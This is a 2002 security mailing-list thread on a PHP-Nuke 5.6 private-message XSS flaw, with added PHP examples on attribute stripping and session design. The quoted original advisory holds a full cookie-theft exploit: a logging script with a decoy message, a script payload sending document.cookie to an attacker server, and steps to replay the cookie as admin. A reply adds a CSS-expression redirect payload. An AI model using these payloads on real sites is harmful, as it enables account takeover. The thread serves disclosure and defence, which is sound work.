RE: PHP-Nuke v5.6 - Users can compromise admin accts.

I think his point is this: simply invoking strip_tags doesn't prevent
scripts or other harmful content from getting through on the tags that you do
allow.

The PHP manual, under the entry for strip_tags(), even notes a
warning:

---
Warning
This function does not modify any attributes on the tags that you allow
using allowable_tags, including the style and onmouseover attributes that a
mischievous user may abuse when posting text that will be shown to other
users.
---
see http://www.php.net/manual/en/function.strip-tags.php

Being able to execute arbitrary javascript in a private message would allow
you to steal the cookies of the admin, though you may have to do a small
amount of social engineering to get the admin to move his mouse over
the text inside the appropriate tag for an onMouseOver call.

Besides, I believe his exploit would work exactly the same for any of the
tags that you do allow.

You might do better with the following code: (warning, not tested!!!!!!
Haven't played with PHP nuke since version 4.something when I was defaced
because of a security bug and stopped using it):

$message = strip_tags($message, '<br><b><u><i>');
// preg_replace() takes (pattern, replacement, subject); the i modifier also catches <B ...>
$message = preg_replace("'(</?[biu][r]?)[^>]*(>)'i", "\\1\\2", $message);

Once again, I'll point out that this code hasn't been tested, it's been a
long time since I played with PHP Nuke or regular expressions.  The idea is
to take the four tags that you do allow, and strip out anything between the
<, optional /, tag name, and >.

-MightyE
www.mightye.org
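Added example (not code from this thread or from PHP-Nuke): a stand-alone PHP
script that shows the behaviour MightyE describes, namely that strip_tags()
leaves attributes on the tags it is told to allow, followed by a second pass
that strips those attributes. The message text is constructed, and the
function names strip_attributes() and sanitize_pm() are chosen here.

```php
<?php
// Added example, not from the thread or from PHP-Nuke. Demonstrates that
// strip_tags() keeps attributes on the tags it is told to allow, then
// removes those attributes with a second pass.

// Constructed sample message: a disallowed <script>, plus allowed <b> and
// <u> tags that carry an event handler and an IE CSS expression.
$message = 'Hi <b onmouseover="alert(document.cookie)">admin</b>, '
         . '<script>alert(1)</script> '
         . '<u style="width: expression(alert(1))">there</u><br />';

$allowed = '<br><b><u><i>';

// Pass 2: rewrite every surviving allowed tag as just "<name>" or "</name>",
// which throws away all attributes. The \b stops "br" from being read as "b"
// followed by junk, and the i modifier covers upper-case tag names.
function strip_attributes($html)
{
    return preg_replace('#<(/?)(br|b|u|i)\b[^>]*>#i', '<${1}${2}>', $html);
}

// Pass 1 is the fix proposed in the thread (strip_tags with an allow list);
// pass 2 is the attribute removal. Only the combination is safe.
function sanitize_pm($text, $allowed = '<br><b><u><i>')
{
    return strip_attributes(strip_tags($text, $allowed));
}

$after_strip_tags = strip_tags($message, $allowed);   // <script> gone, attributes stay
$after_both       = sanitize_pm($message, $allowed);  // bare <b>, <u>, <br> only

echo "strip_tags() only:\n", $after_strip_tags, "\n\n";
echo "strip_tags() plus attribute removal:\n", $after_both, "\n\n";

// A quick check a reviewer can run on the output: no on*= handler and no
// style= attribute may survive the sanitizer.
$leaks = preg_match('/\bon\w+\s*=|\bstyle\s*=/i', $after_both);
echo $leaks ? "attributes still present\n" : "no attributes left on allowed tags\n";
```

Run it with php on the command line. After the first pass the onmouseover=
and style= attributes are still on <b> and <u>; after the second only bare
<b>, <u> and <br> remain (the text "alert(1)" from inside the removed
<script> is kept, as strip_tags always keeps element content). The regex
stops at the first >, so an attribute value that itself contains > leaves a
harmless text fragment behind. For anything richer than four formatting tags
a real HTML sanitizer is a better choice than hand-written regexes.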

-----Original Message-----
From: <-delusion-> [mailto:delusi0n@bellsouth.net]
Sent: Thursday, August 15, 2002 9:16 PM
To: bugtraq@securityfocus.com
Subject: Re: PHP-Nuke v5.6 - Users can compromise admin accts.


Jelmer's accusation that my proposed fix is flawed is wrong. He demonstrates
code that uses the <a> tag; if you look at my solution:

$message = strip_tags($message, '<br><b><u><i>');


The <a> tag is not allowed. Only the tags <br><b><u><i> are allowed. I did
talk to Jelmer and told him my solution successfully stripped the tags from
his code, he replied with this message:

> <?php
> $myText = '<a done=false STYLE="visibility : hidden; word-spacing :
> expression( !(eval(this.done)) ? location.href=\'http://kuperus.xs4all.nl\'
> : 0 ); word-wrap : expression(this.done=true);"> test</a>';
> $string = strip_tags($myText, '<a><b><i><u>'); <a>
> echo $string
>
> ?>
>
> works on my php 4.06

He uses this string..
$string = strip_tags($myText, '<a><b><i><u>'); <a>
which allows the <a> tag, so his code got executed when he ran it.

It was just a mistake on Jelmer's part. If you seek a quick fix for this
vuln, just use my solution. It works.

-delusion
http://digital-delusions.dyn.ee
> On Thu, 2002-08-15 at 19:08, Jelmer wrote:
> > IMHO this whole email is just stating the obvious. On top of that the
> > proposed fix is flawed.
> >
> > The PHP strip_tags function does not strip attributes so this is
> > possible in your proposed fix :
> >
> > <a done=false STYLE="visibility : hidden; word-spacing : expression(
> > !(eval(this.done)) ? location.href='http://kuperus.xs4all.nl' : 0 );
> > word-wrap : expression(this.done=true);"> test</a>
> >
> > its a bit messy but gets the job done. It works by using css expressions
> > (a feature afaik native to Internet explorer) in the style tag.
> >
> > --
> >  jelmer
> >
> > ----- Original Message -----
> > From: "<-delusion->" <delusi0n@bellsouth.net>
> > To: <bugtraq@securityfocus.com>; <webappsec@secuirtyfocus.com>
> > Sent: Thursday, August 15, 2002 10:30 AM
> > Subject: PHP-Nuke v5.6 - Users can compromise admin accts.
> >
> >
> > > Tested on PHP-Nuke v5.6 with Mozilla on Linux
> > > (should work on past versions and on most browsers)
> > >
> > >  Impact:
> > >  ---------------------------------------------
> > >  Allows any user to get admin access to a PHP-Nuke site.
> > >
> > > Summary:
> > > ----------------------------------------------
> > > Due to an XSS flaw in PHPNuke's Private Messaging module, users can send
> > > messages with html code that will be executed without any filtering. In old
> > > PHPNuke versions XSS allowed theft of cookies which stored passwords in base64
> > > encoding. Well, PHPNuke version 5.6 encrypts the passwds in md5 before it
> > > encodes it into base64 and puts it into a cookie. This made stolen cookies
> > > useless if the attacker just tried decoding the base64 encrypted pass, because
> > > he just got the MD5 encrypted pass.
> > >
> > > Since PHP Nuke encrypts passes in md5 and then matches the encrypted pass
> > > with the encrypted one in the database, I was able to use the md5 encrypted
> > > pass I got from the stolen cookie to authenticate myself.
> > >
> > > PHPNuke sets cookies by base64 encoding a string that looks like this:
> > >
> > > username:md5_encrypted_pass:lang
> > >
> > > Since I can get the md5_encrypted pass all I have to do is launch a script
> > > that base64 encodes a string like the one above, and sets it as a cookie on
> > > my box.
> > >
> > > Exploit:
> > > -------------------------------------------------
> > > For this exploit to work, you must create the following files in your web
> > > server's directory.
> > >
> > > cookie.php containing this:
> > > <?
> > > $fp = fopen("cookie.txt","a");
> > > fputs($fp, $cookie);
> > > fclose($fp);
> > > print "Message Not Found!"; /* this is so the admin doesn't get scared
> > > and thinks it's some bug. */
> > > ?>
> > >
> > > test.php containing:
> > > <?
> > > $admin = base64_encode("decoded_string") ;
> > > setcookie("admin","$admin",time()+2592000);
> > > ?>
> > > You will find out what to replace decoded_string with..
> > >
> > > 1. Send an appealing private message to admin containing
> > >
> > > <script>document.location.replace('http://yourserver/cookie.php?cookie='+document.cookie);</script>
> > >
> > > 2. Wait awhile until the admin checks the message then check cookie.txt on
> > > yer server.
> > >
> > > 3. From cookie.txt.. copy the encrypted text after admin= and before the ;
> > >
> > > 4. go to http://www.isecurelabs.com/base64.php paste the copied text, click
> > > decode it should give u a string like this:
> > > username:md5_encrypted_passwd:language (language may be blank).
> > >
> > > 5. paste the decoded string into test.php like so.
> > > <?
> > > $admin = base64_encode("paste decoded string here");
> > > setcookie("admin","$admin",time()+2592000);
> > > ?>
> > >
> > > 6. Login as any user on the site
> > >
> > > 7. send private message to self containing:
> > > <iframe src="http://yerserver/test.php"></iframe>
> > > Open the message and a cookie will now be set on yer box, but it will be
> > > configured with your server's URL.
> > > So all u gotta do is replace yer url wit the nuked site.
> > >
> > > 8. for mozilla edit cookies.txt in yer ~/.mozilla/someprofile/something/
> > > directory replace the url of yer server to the nuked site,
> > > for other browsers just find the Cookie from your server and edit it so
> > > instead of showing your url it shows the url
> > > of the nuked site.
> > >
> > > 9. restart yer browser (close and open up again). go back into the nuked
> > > site and you are now admin. :D
> > >
> > > Temp Solution:
> > > -------------------------------------------------
> > > Edit reply.php in /modules/Private_Messages/ and make $message be stripped
> > > of html tags.
> > >
> > > Go to line 75 in reply.php and add this line:
> > >
> > > $message = strip_tags($message, '<br><b><u><i>');
> > >
> > > That will remove any html tags that aren't <br><b><u> or <i>. So it will
> > > prevent the XSS.
> > > -------------------------------------------------
> > > NOTE: I wasn't able to contact the php nuke person, I couldn't find an email
> > > on their site, and when I signed up for membership I never got the password,
> > > so if u can, let them know asap so they can fix this.
> > >
> > > Another Vulnerability Brought to you  by,
> > > delusion
> > > http://digital-delusions.dyn.ee
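The advisory's steps 3 to 9 are one procedure: pull the admin cookie out via
the private-message XSS, base64-decode it, and re-encode the same
username:md5:lang triple on your own machine. The PHP below is an added
example, not PHP-Nuke's own code: it models that cookie scheme with a
constructed user table and cookie value, shows the replay succeeding against
a check that compares the cookie's hash straight to the stored hash, and
contrasts it with a random server-side session id that a replayed old cookie
cannot reproduce. The function names and sample values are chosen here, and
random_bytes() needs PHP 7 or later.

```php
<?php
// Added example, not PHP-Nuke's own code. Models the cookie scheme the
// advisory describes, admin = base64("username:md5(password):lang"), to show
// why the stolen value is a password equivalent, and contrasts it with a
// random server-side session id.

// Constructed stand-ins for the user table (passwords stored as md5, as the
// advisory says) and for the cookie value the XSS wrote into cookie.txt.
$users  = array('admin' => md5('s3cret'));
$stolen = base64_encode('admin:' . md5('s3cret') . ':english');

// Step 4 of the advisory: base64-decode and split. The limit of 3 keeps a
// blank language field from breaking the split.
function decode_nuke_cookie($value)
{
    $parts = explode(':', base64_decode($value), 3);
    if (count($parts) < 2) {
        return null;
    }
    return array(
        'user' => $parts[0],
        'hash' => $parts[1],
        'lang' => isset($parts[2]) ? $parts[2] : '',
    );
}

// Step 5 of the advisory: rebuild the same triple on the attacker's side.
function encode_nuke_cookie($user, $hash, $lang)
{
    return base64_encode("$user:$hash:$lang");
}

// Model of the flawed check: the hash from the cookie is compared directly
// to the stored hash, so whoever holds the hash is logged in. md5 is never
// reversed here, it is simply replayed.
function vulnerable_is_logged_in($cookie, $users)
{
    $c = decode_nuke_cookie($cookie);
    return $c !== null
        && isset($users[$c['user']])
        && $users[$c['user']] === $c['hash'];
}

$c      = decode_nuke_cookie($stolen);
$forged = encode_nuke_cookie($c['user'], $c['hash'], $c['lang']);
echo "forged cookie accepted: ",
     vulnerable_is_logged_in($forged, $users) ? 'yes' : 'no', "\n";

// Hardened model: the cookie carries only an opaque random id that maps to a
// server-side session. Nothing password-derived leaves the server, and a
// logout or timeout invalidates every copy of the id an attacker captured.
$sessions = array();

function login_with_session($user, &$sessions)
{
    $id = bin2hex(random_bytes(16));   // PHP 7+; 128 bits from the CSPRNG
    $sessions[$id] = $user;
    // In a real handler: setcookie('admin', $id, 0, '/', '', true, true);
    // The last two flags (secure, httponly) keep document.cookie from
    // reading the id, so the same XSS cannot exfiltrate it.
    return $id;
}

function hardened_is_logged_in($id, $sessions)
{
    return isset($sessions[$id]) ? $sessions[$id] : null;
}

$id = login_with_session('admin', $sessions);
unset($sessions[$id]);   // admin logs out, or the session expires
echo "replayed session id accepted: ",
     hardened_is_logged_in($id, $sessions) === null ? 'no' : 'yes', "\n";
```

The first line of output is "yes": decoding and re-encoding the captured
triple is all the attacker needs, which is why the advisory's steps work
without ever recovering the password. The second is "no": with an opaque
session id the stolen value is only as good as the session it points to.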


